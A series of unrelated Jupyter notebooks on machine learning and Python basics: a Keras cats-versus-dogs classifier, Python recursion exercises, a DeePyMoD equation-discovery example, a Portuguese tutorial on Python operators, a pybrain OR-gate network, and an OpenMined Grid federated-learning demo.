model.add(
MaxPooling2D( pool_size = (2, 2) )
)
#Second convolution
model.add(Convolution2D(
32, 3, 3,
border_mode = 'same',
activation = 'relu'
))
#Second dimensionality reduction
model.add(
MaxPooling2D( pool_size = (2, 2) )
)
#Dimensionality reduction to single array
model.add(Flatten())
#Dense layers - linear model on flattened array
model.add(Dense(100, activation = 'relu'))
#Prevent overfitting by randomly setting some model coeffecients to zero
model.add(Dropout(0.5))
#More dense layers
model.add(Dense(100, activation = 'relu'))
#More overfitting prevention
model.add(Dropout(0.5))
#Last dense layer
model.add(Dense(1))
#Add output to model
model.add(Activation('sigmoid'))
#Compile model and return
model.compile(
loss = 'binary_crossentropy',
optimizer = 'adam',
metrics=['accuracy']
)
return model
model = CatDog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
We find the train accuracy is increased and convolution speed faster Increase the convolution filters numbers and see the change
###Code
optimizer = 'adam'
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu'))
model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
nb_epoch = 4
batch_size = 128
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_valid, Y_valid))
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The test accuracy is very low and the convolution speed is too slow, but the train accuracy is high Find the best epochs number Finally we get two models, one is 32*32 with 4 convolution filters and adam as optimizer The other is 64*64 with 8 convolution filters and RMSprop as optimizer We use the 4 epochs before. In fact we don't know the best number of epochs so we set 50 epochs to see the tendency of the train accuracy.
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 32
COLS = 32
CHANNELS = 1
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1, 32,32,1)
test = test.reshape(-1, 32,32,1)
X_train = train.astype('float32')
X_test = test.astype('float32')
X_train /= 255
X_test /= 255
Y_train=labels
X_valid = X_train[:5000,:,:,:]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000,:,:,:]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
optimizer = 'adam'
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu'))
model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
#model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
#model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
#model.add(MaxPooling2D(pool_size=(1, 1)))
#model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
#model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
#model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 80,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
 So we think this model's best epochs number should be 30
###Code
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 30,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The train accuracy is 0.97 and the test accuracy is 0.73
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 64
COLS = 64
CHANNELS = 3
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1,3,64,64)
test = test.reshape(-1,3,64,64)
X_train = train.astype('float64')
X_test = test.astype('float64')
X_train /= 255
X_test /= 255
Y_train = labels
X_valid = X_train[:5000, :, :, :]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000, :, :, :]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
sns.countplot(labels)
plt.title('Cats and Dogs')
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
history = model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 80,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
 We think the best number should be around 24
###Code
history = model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 24,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
|
phython paper.ipynb | ###Markdown
Q1Write a Python program to calculate the sum of a list of numbers using recursive function. For any given list like [2, 4, 5, 6, 7] and recursive function i.e. def list_sum(num_List), which one of following options related to the code will be correct?
###Code
def listsum(numlist):
if len(numlist)==1:
return numlist[0]
else:
return numlist[0]+listsum(numlist[1:])
print(listsum([2,4,5,6,7]))
###Output
24
###Markdown
Q2Write a Python program to calculate the value of 'a' to the power 'b' using recursion. Suppose the recursive function has been defined as: def power(a, b), where a is the base and b is the exponent. Then which of the following options cannot be true
###Code
def power(a,b):
if b==0:
return 1
elif b==1:
return a
else:
return(a*power(a,b-1))
a=4
b=2
print(power(a,b))
###Output
16
###Markdown
Q3 Write a Python program to count repeated characters in a string. State whether the dictionary might be helpful in this case or notitalicized text
###Code
import collections
str1="hhfgffgfgcgchcdfdtd"
d=collections.defaultdict(int)
for c in str1:
d[c]+=1
for c in sorted(d,key=d.get,reverse= True):
if d[c]>1:
print("%s%d"%(c,d[c]))
###Output
f5
g4
h3
c3
d3
###Markdown
Q4Write a Python program to find intersection of two given arrays using Lambda. Which of the followings will be the correct interpretation of lambda expression? Note here array_nums1 and array_nums2 are two input arrays.**bold text**
###Code
num1=[2,4,6,7]
num2=[1,2,3]
print("orignalarrays:")
print(num1)
print(num2)
result=list(filter(lambda x:x in num1,num2))
print("\n intersection of the array:",result)
###Output
orignalarrays:
[2, 4, 6, 7]
[1, 2, 3]
intersection of the array: [2]
###Markdown
Q5Write a Python program to add two given lists and find the difference between lists. Use map() function. which of the following would be the correct function definition? *
###Code
num1=[1,2,3,4,5]
num2=[2,4,5,6]
print("list:")
print(num1)
print(num2)
result=map(lambda x,y:x+y,num1,num2)
print(list(result))
###Output
list:
[1, 2, 3, 4, 5]
[2, 4, 5, 6]
[3, 6, 8, 10]
###Markdown
Q6Write a recursive Python Program to copy one String to another. Which of the following can be the base condition.**bold text**
###Code
def copy_string(str,str1,i):
str1[i]=str[i]
if(str[i]=='\0'):
return
copy_string(str,str1,i+1)
str=input("enter the string")
str+='\0'
str1=[0]*(len(str))
copy_string(str,str1,0)
print("copy string is:","".join(str1))
###Output
enter the stringharsh
copy string is: harsh
|
examples/Example_new_deepmod.ipynb | ###Markdown
In this notebook we show how to use the new deepymod code and phimal utilities to load data and perform data analysis:
###Code
import numpy as np
import pandas as pd
import torch
from DeePyMoD_SBL.deepymod_torch.library_functions import library_1D_in
from DeePyMoD_SBL.deepymod_torch.DeepMod import DeepModDynamic
from DeePyMoD_SBL.deepymod_torch.training import train_dynamic
from sklearn.linear_model import LassoLarsIC
from phimal_utilities.data import Dataset
from phimal_utilities.data.burgers import BurgersDelta
from phimal_utilities.analysis import load_tensorboard
if torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
import seaborn as sns
import matplotlib.pyplot as plt
plt.style.use('ggplot')
%load_ext autoreload
%autoreload 2
###Output
The autoreload extension is already loaded. To reload it, use:
%reload_ext autoreload
###Markdown
Making data
###Code
x = np.linspace(-3, 4, 100)
t = np.linspace(0.5, 5.0, 50)
x_grid, t_grid = np.meshgrid(x, t, indexing='ij')
###Output
_____no_output_____
###Markdown
Create a dataset by giving your solution to the object and its parameters (make sure they're named)
###Code
dataset = Dataset(BurgersDelta, v=0.1, A=1.0)
###Output
_____no_output_____
###Markdown
We can easily generate a solution given our grid:
###Code
u = dataset.generate_solution(x_grid, t_grid)
frame = 10
plt.plot(x, u[:, frame - 10])
plt.plot(x, u[:, frame])
plt.plot(x, u[:, frame + 10])
###Output
_____no_output_____
###Markdown
Or check if our solution is correct using the library:
###Code
theta = dataset.library(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1))
dt = dataset.time_deriv(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1))
np.linalg.lstsq(theta, dt, rcond=None)[0]
###Output
_____no_output_____
###Markdown
We can also automatically create input data for deepmod. To confirm we add noise, we use all samples (set n_samples=0 for all) and turn of randomization:
###Code
X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=0, noise=0.1, random=False)
u_noisy = y_train.reshape(x_grid.shape).cpu().detach().numpy()
frame = 10
plt.plot(x, u[:, frame], label='True')
plt.plot(x, u_noisy[:, frame], label='Noisy')
plt.legend()
###Output
_____no_output_____
###Markdown
Now let's generate a real dataset:
###Code
X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=2000, noise=0.1, random=True)
###Output
_____no_output_____
###Markdown
Running deepmod Now we show how to use the new deepmod. We first define which sparsity estimator we want to use. All estimators from scikitlearn are fine. set fit_intercept to false as that term is in our model.
###Code
estimator = LassoLarsIC(fit_intercept=False)
###Output
_____no_output_____
###Markdown
Then we define the config and build the model as always:
###Code
config = {'n_in': 2, 'hidden_dims': [30, 30, 30, 30, 30], 'n_out': 1, 'library_function':library_1D_in, 'library_args':{'poly_order':2, 'diff_order': 2}, 'sparsity_estimator': estimator}
model = DeepModDynamic(**config)
#In the future, I want to change the api so that we would do the following:
'''
function_approximator = network(n_in=2, hidden_dims=[30, 30, 30, 30, 30], n_out=1)
library = Library(function=library_1D_in, poly_order=2, deriv_order=2)
sparse_estimator = Estimator(fit_intercept=False)
model = DeepMoD(function_approximator, library, sparse_estimator)
'''
# main reason is not to get a massive config dictionary which is not very clear. This would also be super flexible.
###Output
_____no_output_____
###Markdown
Define the optimizer:
###Code
optimizer = torch.optim.Adam(model.network_parameters(), betas=(0.99, 0.999), amsgrad=True)
###Output
_____no_output_____
###Markdown
And train for 15k:. We start the sparsity update after 5000 iterations so we have a good estimate of the data and update it every 200 iterations after:
###Code
train_dynamic(model, X_train, y_train, optimizer, 15000, loss_func_args={'start_sparsity_update': 5000, 'sparsity_update_period': 200})
###Output
| Iteration | Progress | Time remaining | Cost | MSE | Reg | L1 |
15000 100.00% 0s 3.44e-04 3.41e-04 2.66e-06 0.00e+00
###Markdown
We get the following coefficients from the sparsity model (which are biased by the l1):
###Code
model.sparsity_estimator.coef_
###Output
_____no_output_____
###Markdown
The unbiased coefficients we get from the network by:
###Code
model.constraints.coeff_vector
###Output
_____no_output_____
###Markdown
It has one extra term, but its super small. Thats an issue for next time. This is done with 10% noise. Analysing To analyse more in depth, we can load the tensorboard file:
###Code
# right now works with file path, will change to experiment_ID
df = load_tensorboard('runs/Apr22_16-06-14_4b6076e78386/')
df.head(5)
###Output
_____no_output_____
###Markdown
All the keys are:
###Code
df.keys()
###Output
_____no_output_____
###Markdown
We plot the losses:
###Code
plt.figure(figsize=(20, 5))
plt.subplot(131)
plt.semilogy(df.index, df['Total_loss'], label='Total')
plt.semilogy(df.index, df['MSE_0'], label='MSE')
plt.semilogy(df.index, df['Regression_0'], label='PI')
plt.title('All losses')
plt.legend()
plt.subplot(132)
plt.semilogy(df.index, df['MSE_0'], label='MSE')
plt.title('MSE')
plt.subplot(133)
plt.semilogy(df.index, df['Regression_0'], label='PI')
plt.title('Regression')
###Output
_____no_output_____
###Markdown
Now let's look at the coefficients:
###Code
coeff_keys = [key for key in df.keys() if key[:5]=='coeff']
scaled_coeff_keys = [key for key in df.keys() if key[:6]=='scaled']
for key in coeff_keys:
plt.plot(df[key], label=f'{key[-1]}')
plt.legend()
plt.ylim([-1.5, 0.5])
plt.title('Coefficients')
for key in scaled_coeff_keys:
plt.plot(df[key], label=f'{key[-1]}')
plt.legend()
plt.ylim([-1.5, 1])
plt.title('Scaled coefficients')
###Output
_____no_output_____
###Markdown
So we do see a few kinks but not many and certainly with minimal effect. We can also check when terms in are the model:
###Code
in_model = []
for key in scaled_coeff_keys:
in_model.append(df[key].to_numpy()[:, None])
in_model = np.concatenate(in_model, axis=1)
in_model[np.abs(in_model) > 0 ]= 1
sns.heatmap(in_model)
plt.title('Heatmap of coefficients in model')
###Output
_____no_output_____ |
python-language/Operadores.ipynb | ###Markdown
> **Autor:** Érick Barbosa de Souza>> **Home:** https://abre.ai/ebsouza-pagina>> **Instagram:** @erickbsouza--- **Operadores**São símbolos especiais que tem um significado próprio para a linguagem e estão associados a determinadas operações. Na linguagem Python existem, por exemplo, operadores aritméticos, lógicos, de comparação, atribuição, etc.Todo operador necessita de pelo menos um operando. Por exemplo, a expressão 'a + b' contém um operador(+) e dois operandos('a' e 'b'). Outro exemplo é a expressão 'not a', que possui apenas um operador(not) e um operando(a). **Operadores aritméticos**Realizam operações matemáticas entre dois valores do tipo numérico. | Operador | Significado | Exemplo || :--- | :----: | ---: || + | Soma dois valores | a + b || - | Subtrai dois valores | a - b || * | Multiplica dois valores | a * b || / | Divide o valor da esquerda pelo da direita | a / b || // | Resultado como valor inteiro da divisão pelo operador '/' | a // b || % | Resto da divisão da operação 'a / b' | a % b || ** | Eleva 'a' a potencia de 'b' | a ** b |
###Code
#Exemplos
a = 22
b = 4
# Output: a + b = 26
print('a + b =',a+b)
# Output: a - b = 18
print('a - b =',a-b)
# Output: a * b = 88
print('a * b =',a*b)
# Output: a / b = 5.5
print('a / b =',a/b)
# Output: a // b = 5
print('a // b =',a//b)
# Output: a % b = 2
print('a % b =',a%b)
# Output: a ** b = 234256
print('a ** b =',a**b)
###Output
a + b = 26
a - b = 18
a * b = 88
a / b = 5.5
a // b = 5
a % b = 2
a ** b = 234256
###Markdown
**Operadores de comparação**Realizam comparações entre dois valores e o resultado da operação é um valor do tipo lógico. | Operador | Significado | Exemplo || :--- | :----: | ---: || > | 'a' maior que 'b' | a > b || < | 'a' menor que 'b' | a < b || == | 'a' igual a 'b' | a == b || != | 'a' diferente de 'b' | a != b || >= | 'a' maior OU igual a 'b' | a >= b || <= | 'a' menor OU igual a 'b' | a <= b |
###Code
a = 15
b = 28
# Output: a > b is False
print('a > b is',a>b)
# Output: a < b is True
print('a < b is',a<b)
# Output: a == b is False
print('a == b is',a==b)
# Output: a != b is True
print('a != b is',a!=b)
# Output: a >= b is False
print('a >= b is',a>=b)
# Output: a <= b is True
print('a <= b is',a<=b)
###Output
a > b is False
a < b is True
a == b is False
a != b is True
a >= b is False
a <= b is True
###Markdown
Em Python também é possível realizar operadores de comparação em cadeia.
###Code
x = 28
# Output: 10 < x < 20 is False
print('10 < x < 20 is', 10<x<20)
# Output: 20 < b < 30 is True
print('20 < x < 30 is', 20<x<30)
###Output
10 < x < 20 is False
20 < x < 30 is True
###Markdown
**Operadores lógicos**Estes operadores tem valores lógicos como operandos. | Operador | Significado | Exemplo || :--- | :----: | ---: || and | Verdadeiro se 'a' E 'b' são verdadeiros | a and b || or | Verdadeiro se 'a' OU 'b' são verdadeiros | a or b || not | Inversão do valor lógico | not a |
###Code
a = True
b = False
print('a and b is',a and b) # Conjunção(AND) entre 'a' e 'b'
print('a or b is',a or b) # Disjunção(OR) entre 'a' e 'b'
print('not a is',not a) # Negação(NOT) de 'a'
###Output
a and b is False
a or b is True
not a is False
###Markdown
**Operadores Bitwise**Estes operadores atuam diretamente sobre os bits dos valores operados. Por exemplo, a operação 'a & b' resulta num valor cujo os bits são resultados da conjunção dos respectivos bits de 'a' e 'b' na mesma posição.> **a** = 10 (0000 1010)>> **b** = 4 (0000 0100)> > **a** **&** **b** = 0 (0000 0000)
###Code
a = 10 # (0000 1010)
b = 4 # (0000 0100)
print(f"a & b = {a & b} (0000 0000)" ) # Conjunção(AND) entre bits
print(f"a | b = {a | b} (0000 1110)" ) # Disjunção(OR) entre bits
print(f"~a = {~a} (1111 0101)" ) # Negação(NOT) de cada bit
print(f"a ^ b = {a ^ b} (0000 1110)" ) # Ou exclusivo(XOR) entre bits
print(f"a >> 2 = {a >> 2} (0000 0010)" ) # Shift a direita, 2 neste exemplo
print(f"a << 2 = {a << 2} (0010 1000)" ) # Shift a esquerda, 2 neste exemplo
###Output
a & b = 0 (0000 0000)
a | b = 14 (0000 1110)
~a = -11 (1111 0101)
a ^ b = 14 (0000 1110)
a >> 2 = 2 (0000 0010)
a << 2 = 40 (0010 1000)
###Markdown
**Operadores de atribuíção**O operador atribuição(=) pode ser combinado com outros operadores. Isso agiliza bastante a escrita de um código. Afinal, escrever x += 3 é bem mais rápido que x = x + 3 não é mesmo? Confira outros exemplos.
###Code
print( " 'x += 3' é equivalente a 'x = x + 3' ")
print( " 'x -= 3' é equivalente a 'x = x - 3' ")
print( " 'x *= 3' é equivalente a 'x = x * 3' ")
print(" ")
print( " 'x /= 3' é equivalente a 'x = x / 3' ")
print( " 'x %= 3' é equivalente a 'x = x % 3' ")
print( " 'x //= 3' é equivalente a 'x = x // 3' ")
print(" ")
print( " 'x **= 3' é equivalente a 'x = x ** 3' ")
print( " 'x &= 3' é equivalente a 'x = x & 3' ")
print( " 'x |= 3' é equivalente a 'x = x | 3' ")
print(" ")
print( " 'x ^= 3' é equivalente a 'x = x ^ 3' ")
print( " 'x >>= 3' é equivalente a 'x = x >> 3' ")
print( " 'x <<= 3' é equivalente a 'x = x << 3' ")
###Output
'x += 3' é equivalente a 'x = x + 3'
'x -= 3' é equivalente a 'x = x - 3'
'x *= 3' é equivalente a 'x = x * 3'
'x /= 3' é equivalente a 'x = x / 3'
'x %= 3' é equivalente a 'x = x % 3'
'x //= 3' é equivalente a 'x = x // 3'
'x **= 3' é equivalente a 'x = x ** 3'
'x &= 3' é equivalente a 'x = x & 3'
'x |= 3' é equivalente a 'x = x | 3'
'x ^= 3' é equivalente a 'x = x ^ 3'
'x >>= 3' é equivalente a 'x = x >> 3'
'x <<= 3' é equivalente a 'x = x << 3'
###Markdown
**Operadores de identidade**Similar aos operadores de comparação, estes comparam se os operandos são iguais como objetos e não apenas em conteúdo(valores).Estes operadores são ainda mais importantes quando trabalhamos com Programação Orientada a Objetos.
###Code
a = 1
b = '1'
# Output: a is b = False
print(" a is b =", a is b)
# Output: a is not b = True
print(" a is not b =", a is not b)
a = [1,2,3,4,5]
a = ['1','2','3','4','5']
# Output: a is b = False
print(" a is b =", a is b)
# Output: a is not b = True
print(" a is not b =", a is not b)
###Output
a is b = False
a is not b = True
|
semana07-30-10-2020/funcoes-logicas-pybrain/.ipynb_checkpoints/Rede Neural - OR-checkpoint.ipynb | ###Markdown
Implementando uma Função Lógica OR com Redes Neurais Criando uma rede neural via pybrain para a estrutura de condição lógica OR. 
###Code
# importando as funções da biblioteca pybrain do python
from pybrain.tools.shortcuts import buildNetwork
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure.modules import SigmoidLayer
from pybrain.structure.modules import LinearLayer
# definindo uma rede neural com 2 neurônios na camada de entrada, 3 na camada oculta e 1 na camada de saída
# usando o melhoramento 'LinearLayer' na função de ativação das camadas ocultas
# usando o melhoramento 'SigmoidLayer' na função de ativação da camada de saída
rede = buildNetwork(2, 3, 1, hiddenclass = LinearLayer, outclass = SigmoidLayer)
# definindo uma base de dados com 2 entradas nos atributos previsores e 1 saída no atributo meta
base = SupervisedDataSet(2, 1)
# adicionando o primeiro dado para o treinamento da base de dados
base.addSample((0,0), (0, ))
# adicionando o segundo dado para o treinamento da base de dados
base.addSample((0,1), (1, ))
# adicionando o terceiro dado para o treinamento da base de dados
base.addSample((1,0), (1, ))
# adicionando o quarto dado para o treinamento da base de dados
base.addSample((1,1), (1, ))
# observe que os dados obedecem ao estilo da estrutura de condição lógica OR
# visualizando os atributos previsores da base de treinamento
print(base['input'])
# visualizando os atributos meta da base de treinamento
print(base['target'])
# definindo o objeto de treinamento para a base de dados criada
# a taxa de aprendizagem será de 0.01
# o momentum será de 0.06
treinamento = BackpropTrainer(rede, dataset = base, learningrate = 0.01)
# criando uma lista para plotar um gráfico para a taxa de erro do algoritmo
eixoX = list()
eixoY = list()
# estrutura de repetição para realizar o treinamento da rede neural 30000 vezes
for indice in range(1, 5000):
# fazendo o treinamento com a base de dados criada
erro = treinamento.train()
eixoX.append(indice - 1)
eixoY.append(erro)
# mostra a taxa de erro a cada 1000 repetições
if indice % 1000 == 0:
print('Erro: {}'.format(erro))
# visualizando a capacidade de predição do algoritmo
print(rede.activate([0, 0])) # saída esperada: próximo de 0
print(rede.activate([1, 0])) # saída esperada: próximo de 1
print(rede.activate([0, 1])) # saída esperada: próximo de 1
print(rede.activate([1, 1])) # saída esperada: próximo de 0
# importando a biblioteca de funções matplotlib do Python
import matplotlib.pyplot as plt
# definindo as dimensões do gráfico
plt.figure(figsize = (10,5))
# plotando o gráfico da taxa de erro durante cada treinamento
plt.plot(eixoX, eixoY, color = "Red", label = "Gráfico da taxa de erro após cada etapa do treinamento")
# plotando o título do gráfico
plt.title("Taxa de Erro do algoritmo")
# adicionando uma grade ao gráfico
plt.grid(True)
# removendo a moldura do gráfico
plt.box(False)
# adicionando as legendas do gráfico
plt.legend()
# adicionando uma legenda ao eixo x
plt.xlabel("Treinamento")
# adicionando uma legenda ao eixo y
plt.ylabel("Erro")
###Output
_____no_output_____ |
notebooks/experimental/Client Worker Tree.ipynb | ###Markdown
IMDB FastText ExampleAdopter for Grid from https://raw.githubusercontent.com/keras-team/keras/master/examples/imdb_fasttext.py
###Code
from grid.clients.keras import KerasClient
client = KerasClient()
from __future__ import print_function
import numpy as np
import os
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Embedding
from keras.layers import GlobalAveragePooling1D
from keras.datasets import imdb
ngram_range = 1
max_features = 20000
maxlen = 400
batch_size = 32
embedding_dims = 50
epochs = 5
model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features,
embedding_dims,
input_length=maxlen))
# we add a GlobalAveragePooling1D, which will average the embeddings
# of all words in the document
model.add(GlobalAveragePooling1D())
# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
from pathlib import Path
task = 'imdb10'
parent_folder = os.path.abspath('..')
client.add_task(task, adapter=f'{parent_folder}/grid/adapters/imdb.py')
client.add_model(task, model)
# model.fit(x_train, y_train,
# batch_size=batch_size,
# epochs=epochs,
# validation_data=(x_test, y_test))
###Output
Using TensorFlow backend.
###Markdown
Worker
###Code
from grid.workers.tree import GridTree
worker_tree = GridTree()
###Output
[34mUPDATE: [0mConnecting to IPFS... this can take a few seconds...
[32mSUCCESS: [0mConnected!!! - My ID: QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
[32m v . ._, |_ .,
`-._\/ . \ / |/_
\ _\, y | \//
_\_.___\, \/ -.\||
`7-,--.`._|| / / ,
/' `-. `./ / |/_.'
| |//
[33mRunning Grid in[32m |_ /
[33mTree Mode[32m |- |
| =|
| |
--------------------/ , . \--------._[0m
[34mUPDATE: [0mQuerying known workers...
WORKER: /p2p-circuit/ipfs/Qmaosc64H6Y29VFCFYJzJXCX9AuRp7RCsekLmajHNVEARD...[32mSUCCESS!!![0m
WORKER: /p2p-circuit/ipfs/QmQabt3SWuDvjse9z7GAcH2BGQv4wH8bumkd4x5oXN2obX...[31mFAIL!!![0m
[34mUPDATE: [0mSearching for IPFS nodes - 34 found overall - 1 are OpenMined workers
[32mSUCCESS: [0mFound 1 OpenMined nodes!!!
[37m[40m TASKS [0m
From Name Address
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod==================================================================
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg
